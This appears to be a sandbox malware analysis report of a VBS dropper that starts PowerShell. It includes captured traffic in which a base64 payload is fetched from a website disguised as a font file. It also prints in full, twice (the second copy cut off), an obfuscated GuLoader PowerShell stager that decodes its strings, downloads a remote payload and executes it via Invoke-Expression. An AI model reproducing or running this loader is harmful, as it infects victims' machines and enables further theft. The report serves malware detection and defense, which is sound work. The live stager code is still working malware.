                                                                          2024-11-30 19:15:49 UTC207OUTGET /fileadmin/wolter/Overpainful.afm HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                          Host: www.elektroservice-neuruppin.de
                                                                          Connection: Keep-Alive
                                                                          2024-11-30 19:15:50 UTC310INHTTP/1.1 200 OK
                                                                          Date: Sat, 30 Nov 2024 19:15:50 GMT
                                                                          Server: Apache/2.4.62 (Unix)
                                                                          Vary: User-Agent
                                                                          Upgrade: h2,h2c
                                                                          Connection: Upgrade, close
                                                                          Last-Modified: Tue, 26 Nov 2024 17:44:36 GMT
                                                                          ETag: "70628-627d4671f7943"
                                                                          Accept-Ranges: bytes
                                                                          Content-Length: 460328
                                                                          Content-Type: application/x-font-type1
                                                                          2024-11-30 19:15:50 UTC7882INData Raw: 63 51 47 62 63 51 47 62 75 37 47 42 46 67 42 78 41 5a 74 78 41 5a 73 44 58 43 51 45 36 77 4a 6f 4d 2b 73 43 77 6b 36 35 59 69 38 44 50 65 73 43 52 79 7a 72 41 6c 6c 67 67 65 6d 36 62 43 44 38 36 77 49 6e 41 2b 73 43 32 38 75 42 36 61 6a 43 34 6b 44 72 41 6c 45 56 36 77 4b 62 61 33 45 42 6d 2b 73 43 4a 68 61 36 51 6f 34 55 34 75 73 43 6c 34 44 72 41 76 68 55 36 77 4c 44 52 48 45 42 6d 7a 48 4b 63 51 47 62 63 51 47 62 69 52 51 4c 36 77 49 56 4a 33 45 42 6d 39 48 69 36 77 4c 49 2b 75 73 43 43 64 71 44 77 51 54 72 41 69 41 42 36 77 4c 71 6f 59 48 35 44 2f 46 4b 42 48 7a 4b 36 77 4a 41 51 75 73 43 4f 62 36 4c 52 43 51 45 36 77 49 56 65 2b 73 43 50 6d 65 4a 77 33 45 42 6d 2b 73 43 7a 4c 36 42 77 35 39 45 64 77 42 78 41 5a 76 72 41 6f 63 4e 75 71 78 42 76 37 44
                                                                          Data Ascii: cQGbcQGbu7GBFgBxAZtxAZsDXCQE6wJoM+sCwk65Yi8DPesCRyzrAllggem6bCD86wInA+sC28uB6ajC4kDrAlEV6wKba3EBm+sCJha6Qo4U4usCl4DrAvhU6wLDRHEBmzHKcQGbcQGbiRQL6wIVJ3EBm9Hi6wLI+usCCdqDwQTrAiAB6wLqoYH5D/FKBHzK6wJAQusCOb6LRCQE6wIVe+sCPmeJw3EBm+sCzL6Bw59EdwBxAZvrAocNuqxBv7D
                                                                          2024-11-30 19:15:50 UTC8000INData Raw: 42 6b 33 73 6a 77 50 48 76 63 64 77 79 77 4d 52 4f 69 72 58 56 48 31 6c 39 65 54 75 44 4c 63 36 63 35 4a 67 33 6f 37 6c 31 54 4b 66 30 62 65 66 39 71 71 6e 65 43 4d 55 4b 4e 45 67 6e 61 68 4f 2b 62 62 50 70 52 30 42 48 6d 4c 5a 72 52 4b 75 51 76 72 78 4a 4e 46 53 46 6a 54 4e 78 7a 56 6c 4f 64 39 39 6c 68 34 51 4b 76 49 4a 6f 31 67 71 59 43 7a 31 2b 6f 30 65 43 73 71 39 31 79 77 52 55 31 54 55 45 46 45 55 4a 42 45 54 56 43 51 52 45 31 51 6b 45 52 4e 51 77 58 57 68 4d 45 47 58 57 4c 4f 37 44 35 57 34 35 63 74 61 56 72 59 56 4d 55 6d 42 51 37 67 2b 46 30 65 71 63 49 6d 54 4e 6c 2b 73 55 67 41 6d 74 30 70 59 71 78 30 53 54 4d 65 2f 33 7a 41 4f 67 6b 76 75 4e 76 32 58 6a 69 7a 38 67 4a 6a 4f 46 4f 6b 78 73 52 6c 57 5a 46 62 70 63 4c 6d 64 49 47 6f 46 36 4e 2b
                                                                          Data Ascii: Bk3sjwPHvcdwywMROirXVH1l9eTuDLc6c5Jg3o7l1TKf0bef9qqneCMUKNEgnahO+bbPpR0BHmLZrRKuQvrxJNFSFjTNxzVlOd99lh4QKvIJo1gqYCz1+o0eCsq91ywRU1TUEFEUJBETVCQRE1QkERNQwXWhMEGXWLO7D5W45ctaVrYVMUmBQ7g+F0eqcImTNl+sUgAmt0pYqx0STMe/3zAOgkvuNv2Xjiz8gJjOFOkxsRlWZFbpcLmdIGoF6N+
                                                                          2024-11-30 19:15:50 UTC8000INData Raw: 58 54 64 77 6f 6b 39 35 5a 4c 6b 65 30 76 41 6a 6c 46 5a 52 2b 4c 36 4e 6f 72 4c 61 39 62 31 37 55 48 79 42 4c 4e 4e 78 54 4b 44 48 47 45 51 57 36 6a 2f 79 31 54 74 36 62 71 51 70 51 6b 78 4d 70 76 66 73 4a 4b 5a 50 74 50 73 74 4a 70 77 4e 42 6a 47 31 6a 54 74 4c 50 62 63 69 4c 72 77 4e 43 4c 67 63 58 30 74 49 4d 46 6a 46 61 52 45 59 32 38 6f 6b 41 5a 71 43 54 45 32 30 68 4d 62 46 50 6f 65 4a 51 68 35 47 53 62 76 6f 37 55 41 48 78 4f 75 31 7a 34 6a 61 4c 45 57 52 71 72 31 31 57 52 43 43 41 4a 34 79 53 71 58 57 4f 77 2f 6f 42 79 55 61 66 64 63 61 68 44 69 32 33 58 76 47 53 4e 31 37 79 45 38 4e 75 6d 36 5a 36 5a 49 4d 79 69 56 36 77 4b 6d 62 53 2f 4a 77 4c 2f 46 2b 4f 4b 30 77 59 43 30 34 34 46 2b 7a 66 59 47 59 54 49 4e 2f 6d 45 79 4e 65 45 69 4e 4b 36 36
                                                                          Data Ascii: XTdwok95ZLke0vAjlFZR+L6NorLa9b17UHyBLNNxTKDHGEQW6j/y1Tt6bqQpQkxMpvfsJKZPtPstJpwNBjG1jTtLPbciLrwNCLgcX0tIMFjFaREY28okAZqCTE20hMbFPoeJQh5GSbvo7UAHxOu1z4jaLEWRqr11WRCCAJ4ySqXWOw/oByUafdcahDi23XvGSN17yE8Num6Z6ZIMyiV6wKmbS/JwL/F+OK0wYC044F+zfYGYTIN/mEyNeEiNK66
                                                                          2024-11-30 19:15:50 UTC8000INData Raw: 4d 76 6d 7a 78 44 71 63 75 6a 45 43 2f 66 65 4e 46 42 57 50 58 4e 46 70 75 56 51 34 72 4c 7a 4f 41 6d 42 45 32 49 51 37 4d 46 2f 56 2b 6c 2f 6a 72 2b 64 46 54 58 6e 43 76 6e 43 52 77 44 73 5a 69 56 32 52 4c 53 4d 49 75 42 45 4a 2f 73 56 5a 54 31 47 43 65 55 2f 52 6e 4b 48 52 45 51 2b 37 50 65 64 76 61 51 78 32 30 35 4e 56 4c 44 71 77 6c 65 6c 30 71 51 39 38 6d 5a 31 51 34 55 33 5a 6a 54 51 31 65 4d 55 33 75 79 62 54 71 4a 68 79 5a 36 73 41 4c 51 4a 66 69 45 68 58 47 37 4d 56 35 35 51 33 4c 6c 4c 6e 75 43 54 77 32 62 47 36 73 37 55 71 45 6d 5a 2f 68 42 48 36 71 59 77 4f 50 70 5a 45 72 2f 74 4b 67 75 45 36 46 32 79 42 4e 76 55 4e 75 37 4f 42 66 6c 72 70 58 32 49 36 33 77 68 77 47 59 7a 65 4d 34 72 4c 41 77 61 45 76 64 52 77 49 56 4e 63 75 71 48 6a 57 64 33
                                                                          Data Ascii: MvmzxDqcujEC/feNFBWPXNFpuVQ4rLzOAmBE2IQ7MF/V+l/jr+dFTXnCvnCRwDsZiV2RLSMIuBEJ/sVZT1GCeU/RnKHREQ+7PedvaQx205NVLDqwlel0qQ98mZ1Q4U3ZjTQ1eMU3uybTqJhyZ6sALQJfiEhXG7MV55Q3LlLnuCTw2bG6s7UqEmZ/hBH6qYwOPpZEr/tKguE6F2yBNvUNu7OBflrpX2I63whwGYzeM4rLAwaEvdRwIVNcuqHjWd3
                                                                          2024-11-30 19:15:50 UTC8000INData Raw: 45 31 51 6b 45 52 4e 54 76 68 70 44 58 51 2f 6c 7a 36 6c 6e 46 2f 4a 69 33 79 6a 58 6a 4a 39 48 41 33 51 6b 48 35 7a 78 78 44 45 54 71 46 66 31 73 31 51 6b 45 52 4e 55 4a 42 45 54 56 43 51 52 46 64 74 38 72 41 74 45 57 31 33 78 5a 61 53 59 51 4a 75 54 53 76 79 34 4a 4d 41 41 72 75 37 72 4a 58 52 59 68 41 69 32 47 46 78 63 33 4c 78 44 51 33 51 6b 46 47 69 73 56 59 6d 62 72 44 74 68 32 43 70 78 32 51 38 6a 63 54 67 78 6b 53 33 5a 6a 56 51 33 6d 4d 55 38 65 66 5a 44 33 76 6f 33 33 58 2b 4c 46 6b 49 65 37 46 6e 63 6e 35 6c 6c 73 72 50 48 6e 61 62 58 71 30 54 6f 32 59 54 52 31 36 64 37 71 30 72 67 42 30 76 46 46 70 4e 39 33 2b 2f 76 72 43 4e 57 75 34 75 43 7a 6f 44 34 35 79 77 76 68 51 51 71 68 76 56 4f 57 70 7a 79 53 35 6a 2f 31 71 5a 63 6e 45 4e 44 64 43 51
                                                                          Data Ascii: E1QkERNTvhpDXQ/lz6lnF/Ji3yjXjJ9HA3QkH5zxxDETqFf1s1QkERNUJBETVCQRFdt8rAtEW13xZaSYQJuTSvy4JMAAru7rJXRYhAi2GFxc3LxDQ3QkFGisVYmbrDth2Cpx2Q8jcTgxkS3ZjVQ3mMU8efZD3vo33X+LFkIe7Fncn5llsrPHnabXq0To2YTR16d7q0rgB0vFFpN93+/vrCNWu4uCzoD45ywvhQQqhvVOWpzyS5j/1qZcnENDdCQ
                                                                          2024-11-30 19:15:50 UTC8000INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 50 6b 7a 38 47 71 50 54 71 4c 46 4e 67 52 66 51 6e 69 2b 5a
                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAPkz8GqPTqLFNgRfQni+Z
                                                                          2024-11-30 19:15:50 UTC8000INData Raw: 50 48 78 39 5a 57 5a 74 37 49 38 6a 78 52 33 48 65 77 6b 7a 45 43 32 62 43 4e 6c 30 30 36 6a 37 4c 64 42 58 35 6a 71 74 55 33 64 79 6e 53 6a 65 39 47 62 6a 34 33 44 48 33 33 78 36 46 69 52 76 74 43 4d 77 76 4e 38 45 77 6d 38 35 79 52 41 31 58 69 4a 48 6a 5a 62 6e 71 6b 53 34 35 73 34 2f 61 4a 77 36 70 50 5a 53 37 31 6b 50 62 69 59 6f 7a 4e 6a 74 6e 70 59 72 6a 38 6a 53 38 36 4e 4e 43 45 4d 6f 4b 4e 52 44 58 2b 32 53 73 2f 52 46 4d 2f 63 5a 62 77 39 39 65 77 34 75 6a 6e 46 69 71 71 79 70 50 6a 6a 59 49 78 46 79 67 54 69 35 44 65 4c 54 51 4a 4e 42 48 4b 6a 41 74 41 51 52 46 6e 2b 42 61 6a 6d 77 48 41 34 34 69 56 53 47 47 30 71 45 74 6f 6b 33 48 49 49 38 2b 75 46 56 5a 45 63 4c 45 4c 57 44 73 2f 4a 5a 79 68 42 4b 50 77 75 54 5a 4c 37 56 49 78 67 64 5a 59 47
                                                                          Data Ascii: PHx9ZWZt7I8jxR3HewkzEC2bCNl006j7LdBX5jqtU3dynSje9Gbj43DH33x6FiRvtCMwvN8Ewm85yRA1XiJHjZbnqkS45s4/aJw6pPZS71kPbiYozNjtnpYrj8jS86NNCEMoKNRDX+2Ss/RFM/cZbw99ew4ujnFiqqypPjjYIxFygTi5DeLTQJNBHKjAtAQRFn+BajmwHA44iVSGG0qEtok3HII8+uFVZEcLELWDs/JZyhBKPwuTZL7VIxgdZYG
                                                                          2024-11-30 19:15:50 UTC8000INData Raw: 58 7a 64 2f 77 79 6c 51 42 73 66 49 47 4a 6a 55 43 70 79 36 41 51 4e 4e 2f 45 79 45 4e 5a 4a 37 49 56 4b 73 4e 6c 4b 6b 69 38 75 47 44 65 71 7a 64 4f 74 42 74 78 55 62 31 58 75 67 72 54 65 59 46 56 7a 53 68 48 54 32 4f 33 30 4d 41 62 74 74 63 51 46 4e 35 4b 62 52 48 36 5a 68 7a 74 6f 35 44 47 65 47 53 64 6a 38 4f 71 6f 37 72 5a 42 35 44 47 78 52 53 30 52 4d 4f 79 4b 67 6c 67 49 5a 67 47 44 30 4b 58 65 4d 56 73 45 6c 4e 73 63 6b 61 47 31 68 4a 69 34 31 6f 54 56 6f 61 75 62 59 59 61 37 6f 6e 57 31 6f 2f 4b 2b 39 72 69 47 53 42 69 4c 36 49 4a 34 78 6d 70 30 4d 42 43 51 5a 69 67 4a 55 4d 52 4e 66 68 5a 4c 50 2f 53 45 36 74 44 31 6c 78 53 74 4b 67 2b 56 37 5a 2b 77 50 75 6a 55 64 73 58 76 45 68 38 71 6b 7a 6a 63 32 2f 5a 4d 35 75 4e 67 68 70 37 68 30 34 64 4b
                                                                          Data Ascii: Xzd/wylQBsfIGJjUCpy6AQNN/EyENZJ7IVKsNlKki8uGDeqzdOtBtxUb1XugrTeYFVzShHT2O30MAbttcQFN5KbRH6Zhzto5DGeGSdj8Oqo7rZB5DGxRS0RMOyKglgIZgGD0KXeMVsElNsckaG1hJi41oTVoaubYYa7onW1o/K+9riGSBiL6IJ4xmp0MBCQZigJUMRNfhZLP/SE6tD1lxStKg+V7Z+wPujUdsXvEh8qkzjc2/ZM5uNghp7h04dK
                                                                          2024-11-30 19:15:50 UTC8000INData Raw: 6e 44 76 32 77 31 44 31 71 72 4a 42 65 78 75 4d 55 41 66 37 50 39 51 63 74 35 4c 2b 31 4b 31 4f 75 4f 30 7a 7a 59 4e 38 6b 53 61 50 4d 47 48 6b 78 75 44 77 2f 58 45 4a 5a 6f 33 48 48 4a 47 5a 71 41 48 55 4d 52 4e 52 54 2f 66 79 45 75 50 70 44 62 2b 52 4e 7a 46 38 4f 33 2f 53 4e 58 41 35 44 44 54 74 34 38 52 73 4f 33 62 63 42 7a 4c 5a 67 4c 6b 74 57 2b 50 68 54 68 59 53 64 67 48 71 65 68 48 55 52 74 6e 6a 59 34 71 6b 4f 73 79 64 4e 43 42 47 5a 37 5a 46 75 5a 5a 6b 59 57 72 71 39 72 71 6c 66 57 4e 6b 4b 2b 70 4d 31 43 51 52 48 64 38 6f 30 53 4e 52 48 36 5a 32 52 59 64 70 44 47 38 76 64 4d 6b 4d 4f 79 42 69 62 51 48 4a 44 65 4f 32 4b 44 4b 4d 4f 43 79 30 66 2b 44 4a 67 32 6f 6e 6c 6a 53 36 37 4e 41 5a 33 4b 49 51 35 73 2b 57 46 51 55 47 6a 54 67 32 54 7a 73
                                                                          Data Ascii: nDv2w1D1qrJBexuMUAf7P9Qct5L+1K1OuO0zzYN8kSaPMGHkxuDw/XEJZo3HHJGZqAHUMRNRT/fyEuPpDb+RNzF8O3/SNXA5DDTt48RsO3bcBzLZgLktW+PhThYSdgHqehHURtnjY4qkOsydNCBGZ7ZFuZZkYWrq9rqlfWNkK+pM1CQRHd8o0SNRH6Z2RYdpDG8vdMkMOyBibQHJDeO2KDKMOCy0f+DJg2onljS67NAZ3KIQ5s+WFQUGjTg2Tzs
                                                                          2024-11-30 19:15:50 UTC8000INData Raw: 6a 38 47 6a 34 6f 39 38 4e 31 4e 62 71 65 4d 66 79 31 75 47 33 35 58 49 64 43 45 63 4b 42 32 57 63 78 5a 4d 36 55 32 30 4e 42 45 62 37 48 72 78 41 31 51 6f 4d 56 4e 53 53 32 30 4e 72 72 65 65 57 38 33 7a 59 54 4e 55 4a 34 32 6f 35 51 6f 62 43 33 77 37 4b 67 6d 7a 4d 72 4b 64 50 44 73 73 62 33 35 75 59 70 79 38 4f 71 5a 56 6b 32 44 6e 63 4d 6b 78 4b 61 71 44 56 44 45 54 57 71 66 63 49 32 51 73 69 6b 35 6b 4e 42 45 63 4f 42 69 4a 6a 7a 46 4d 71 6b 35 6b 4e 42 45 62 47 75 71 51 59 31 51 6b 46 37 4e 4d 4b 34 56 74 32 36 68 52 49 31 47 6e 6e 76 44 5a 4f 44 46 54 55 6b 77 4f 69 75 33 43 65 51 7a 68 48 4b 6d 6e 46 6d 52 5a 58 39 68 55 48 41 38 47 71 71 6b 41 56 35 39 78 56 74 77 72 70 34 74 48 4c 64 56 5a 53 49 77 43 47 39 64 63 78 6f 55 33 75 59 64 77 79 4a 52
                                                                          Data Ascii: j8Gj4o98N1NbqeMfy1uG35XIdCEcKB2WcxZM6U20NBEb7HrxA1QoMVNSS20NrreeW83zYTNUJ42o5QobC3w7KgmzMrKdPDssb35uYpy8OqZVk2DncMkxKaqDVDETWqfcI2Qsik5kNBEcOBiJjzFMqk5kNBEbGuqQY1QkF7NMK4Vt26hRI1GnnvDZODFTUkwOiu3CeQzhHKmnFmRZX9hUHA8GqqkAV59xVtwrp4tHLdVZSIwCG9dcxoU3uYdwyJR


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          3192.168.2.44976523.200.196.1384431748C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-11-30 19:16:01 UTC475OUTGET /onboarding/smskillreader.txt HTTP/1.1
                                                                          Host: armmf.adobe.com
                                                                          Connection: keep-alive
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          If-None-Match: "78-5faa31cce96da"
                                                                          If-Modified-Since: Mon, 01 May 2023 15:02:33 GMT
                                                                          2024-11-30 19:16:01 UTC198INHTTP/1.1 304 Not Modified
                                                                          Content-Type: text/plain; charset=UTF-8
                                                                          Last-Modified: Mon, 01 May 2023 15:02:33 GMT
                                                                          ETag: "78-5faa31cce96da"
                                                                          Date: Sat, 30 Nov 2024 19:16:01 GMT
                                                                          Connection: close


                                                                          Statistics

                                                                          CPU Usage

                                                                          Click to jump to process

                                                                          Memory Usage

                                                                          Click to jump to process

                                                                          High Level Behavior Distribution

                                                                          Click to dive into process behavior distribution

                                                                          Behavior

                                                                          Click to jump to process

                                                                          System Behavior

                                                                          General

                                                                          Target ID:0
                                                                          Start time:14:14:56
                                                                          Start date:30/11/2024
                                                                          Path:C:\Windows\System32\wscript.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Beschwerde-AutoKauf.vbs"
                                                                          Imagebase:0x7ff62ae60000
                                                                          File size:170'496 bytes
                                                                          MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:1
                                                                          Start time:14:14:56
                                                                          Start date:30/11/2024
                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$eroticizing='Federarie';;$Slambehandlingsanlggets='Shadowishly';;$Udfolder='Briarwood';;$Jkel='Backingbandet';;$Gangarealerne138='Karakteristikkernes';;$Dokumenttype=$host.Name;function Hjemmemarkedernes($Rodfstede){If ($Dokumenttype) {$Afhjulpne=2} for ($Fabrikationens=$Afhjulpne;;$Fabrikationens+=3){if(!$Rodfstede[$Fabrikationens]) { break }$Puncheon+=$Rodfstede[$Fabrikationens]}$Puncheon}function auspiciums($ouananiche){ .($Recirculated) ($ouananiche)}$Cockneyfying=Hjemmemarkedernes ' n .EPiT .UnwTiE eBEpc,eLUsIHaeH nR T';$Noncandescent=Hjemmemarkedernes 'AaMlno AzT,iInl ,l a,e/';$Thoracostenosis=Hjemmemarkedernes 'S.T OlA,sTh1We2';$Kartonets247='Jo[ SNAnE oTB . ,S,nES.RA v ,I RCSte ,pslO riKnN.iTMambaaHan ,AE GSmEStr ] l:G :D S DEV.CTeuCerBiIFotDuY EP rR.aOMiT iOm csuoTel r= L$CotArHVgOXeRDiaTacAcoUnSP tEpEUnNS OP,sV iHes';$Noncandescent+=Hjemmemarkedernes 'No5 e.f 0St R(G WeriScn.odAuoRewTos K RgNAdTSl Sr1Oa0,e.Cr0Un;Go EpW eiKun,r6 D4Ty;Re ax o6Fi4 a; HrOxvAf: V1 r3Si1 H.De0Da) l .GTveGacStkOvoSt/Ma2Be0Re1Co0I.0 O1de0in1Ho ChF HiBhrGeeSkfIdo rxUn/Re1m,3Ib1lu. i0';$Engangsafgift=Hjemmemarkedernes '.aU.iS oeCrr l-PyADigUne NS.t';$Ammunitionsfabrikkens=Hjemmemarkedernes ' Th tCot Fp.tsdv:Sp/Pa/ wUtw.nwO .AdlExeMebInePen es.erEkaFreOluIam MeUd-KogStgHamS bUnhAk.Ind Se / StCoep mThpAnlSdaT tO.eSt/Hei.on ecRu_LycAfsJesSt/Fys op seMec ,iPlfLeiU.cMa/ReKslv uiUmdcorMoeG da.eP sMo. BpR c nz';$moistureproof=Hjemmemarkedernes ' B>';$Recirculated=Hjemmemarkedernes 'viiSkEKeX';$Anionics='Resbolig';$Arcuation='\raadede.Erg';auspiciums (Hjemmemarkedernes 'Un$M,g Ul mO.tbBiAJaL :GhlQyYU,OEfnUneAbtBlIFyaEo=Bo$UnE,vnAavSi: OAtiPSuPunD ta pTTrA A+bl$S aUnrSec,auGraStt CIFooAfn');auspiciums (Hjemmemarkedernes ' .$Sig rl,rOInBL a rlFo:BaR iiSanStN eI dEbe=Vi$ BA .m mAmUL n ,iItTG IMaoSpNSpS eFNoaEnbmerUfi kR KVaePrn TSBa.EnsMaP SLM IAnTTi(Wr$BiMpaoTaIMos rtBuUq REpEDyp mrS OTro dFLi)');auspiciums (Hjemmemarkedernes $Kartonets247);$Ammunitionsfabrikkens=$Rinnie[0];$Chaffer=(Hjemmemarkedernes 'gu$ovGBulMaOMiBIsaKrlMa: Tb Ko,urGaTSySAnk MAD F aF SE alFosS,e KSK mcoENots o OdSieKoR mnMoEAd= BnPrEY.WSt- COSuBSkjOvEDuCUntF HjSCoYK S QTNeEF MS .S $ fc .OL c Hk ,n Ce rY RfSuyB i eN og');auspiciums ($Chaffer);auspiciums (Hjemmemarkedernes 'h $,sBVioSerSttA s.ukB aTufPrf PeFrlNasAneTes dm jeGatUnoEgdBue r Kn ,e N.BeHZ,ehaaB dwieUdrPhsko[I $ ERennegPoaPanU.g,rs,eaWifGagS.iG fRntUd] a=p $ N.oo,anYac raR.nRedS e.tsMac LeFon .t');$Internes=Hjemmemarkedernes 'se$E BAfoPlrRat sNok aCefKofSce Sl.lsNoeAnsTem.ae,ntFaoRodSpeAnrO.nUnet .,mDMooSlwA.n lStoGaaOrd OFIni elAdeAt( n$CaAS mGom vuPsnT,iOrt SiP o OnL.sInfE a Fbpir.yiMak tkM eminGls a,Rh$MyO.ykInsT.e ojReeBa)';$Okseje=$Lyonetia;auspiciums (Hjemmemarkedernes '.a$Kog.eL oo ABBeAF,lUn: EU,tN kAFrdXeDVaUVecCoe.ga,sB,olAfe ,=,y(PaTK ETesLeTSt-PrpMeaUnT CH B Sl$ o UK esFrEP JUnEFn)');while (!$Unadduceable) {auspiciums (Hjemmemarkedernes ' $HegMilV oAdbA a DlD :KoSf t a da MlBrt,raSkn NkKde = A$PrMJ.e nd,t KaT,3M 8') ;auspiciums $Internes;auspiciums (Hjemmemarkedernes ' GsBltInaHeRBlTPa-S.sOlLnoEK EOxP S Qu4');auspiciums (Hjemmemarkedernes ' $ gKaLReo ,BriAbrl a:JuuUdN DAStDC dIrUVecSuEElaPabSalKaeF,=La( Otb e aSFoT -OmPN aSaTGlh b T$AfoUrk SVaE ,JT e M)') ;auspiciums (Hjemmemarkedernes 'Ch$FlGS,L ,oApBPraTrL o:NyR neUnsW usaBCosTit CADinFrt IbaA.lTBlI tnR g =Un$PuG.kL sOStbFiaCoL,i: UA GSMiHOsL ER s,as s+De+A %Un$PeRtoI onBonObi rEFo.RucSeoBluCoNPaT') ;$Ammunitionsfabrikkens=$Rinnie[$Resubstantiating]}$Catfacing=330712;$Phoning197=28597;auspiciums (Hjemmemarkedernes 'To$SmGjeL CoOvbUna uL A: GOH vlaED R,hc aH,P.nI etR A oL ,IMozMae = O CgCyeS tBa-O.cVaOFoNS.tTrE.uNSiT,r u$Pho TKGus,nE OjP e');auspiciums (Hjemmemarkedernes 'Co$OrgEplFaoMebSvaMilaf:,oFBarAna fS.rFlsE e ,lBleFrnS ,e=Cy ,[ iSBrylnsC t,heDim . CP,ofonMevr.eRnrBrt ]D.:Ma: VF Br tor m rBIsa esBeeFi6 T4 BSAbt .r diO nR gS ( i$.eO vA e rSkcFoa tpGti DtSca Sl siOvzB eSn)');auspiciums (Hjemmemarkedernes ' e$AfGSaLRoO rb,raAml.e: Ap Ve ynE.tSeA esSct Fo ,mInuBomAg Li=Ou [EnS Y uSG.T leG MOp.AfTPse.uxErtCa. rEPeNT.CLaODoD .iUnNAng r] A: ,:p A iS ecPhiDaiO .v gSlEPrtP S VtK r IB.NDegMa(sc$ByF Tr eA ifMaROpS,oeK L pEAnNqu)');auspiciums (Hjemmemarkedernes ' i$GrG hL ounBMea slFc:Udh pU aR ST iIHjGPar dUsuTAvECer ,SU =un$U,P PeRuN ,tL aFesRhTH,OMiMSouA MEv.BrS.eU bHeSTet ,rcai.in BgUl( $Soc a TSufO.aLoCKeI ,NOrGLe, s$ Fp eHlaORenBai eNReGGr1 9M 7In)');auspiciums $Hurtigruters;"
                                                                          Imagebase:0x7ff788560000
                                                                          File size:452'608 bytes
                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000001.00000002.1843130154.000001E7E1F01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:2
                                                                          Start time:14:14:56
                                                                          Start date:30/11/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff7699e0000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:3
                                                                          Start time:14:15:08
                                                                          Start date:30/11/2024
                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$eroticizing='Federarie';;$Slambehandlingsanlggets='Shadowishly';;$Udfolder='Briarwood';;$Jkel='Backingbandet';;$Gangarealerne138='Karakteristikkernes';;$Dokumenttype=$host.Name;function Hjemmemarkedernes($Rodfstede){If ($Dokumenttype) {$Afhjulpne=2} for ($Fabrikationens=$Afhjulpne;;$Fabrikationens+=3){if(!$Rodfstede[$Fabrikationens]) { break }$Puncheon+=$Rodfstede[$Fabrikationens]}$Puncheon}function auspiciums($ouananiche){ .($Recirculated) ($ouananiche)}$Cockneyfying=Hjemmemarkedernes ' n .EPiT .UnwTiE eBEpc,eLUsIHaeH nR T';$Noncandescent=Hjemmemarkedernes 'AaMlno AzT,iInl ,l a,e/';$Thoracostenosis=Hjemmemarkedernes 'S.T OlA,sTh1We2';$Kartonets247='Jo[ SNAnE oTB . ,S,nES.RA v ,I RCSte ,pslO riKnN.iTMambaaHan ,AE GSmEStr ] l:G :D S DEV.CTeuCerBiIFotDuY EP rR.aOMiT iOm csuoTel r= L$CotArHVgOXeRDiaTacAcoUnSP tEpEUnNS OP,sV iHes';$Noncandescent+=Hjemmemarkedernes 'No5 e.f 0St R(G WeriScn.odAuoRewTos K RgNAdTSl Sr1Oa0,e.Cr0Un;Go EpW eiKun,r6 D4Ty;Re ax o6Fi4 a; HrOxvAf: V1 r3Si1 H.De0Da) l .GTveGacStkOvoSt/Ma2Be0Re1Co0I.0 O1de0in1Ho ChF HiBhrGeeSkfIdo rxUn/Re1m,3Ib1lu. i0';$Engangsafgift=Hjemmemarkedernes '.aU.iS oeCrr 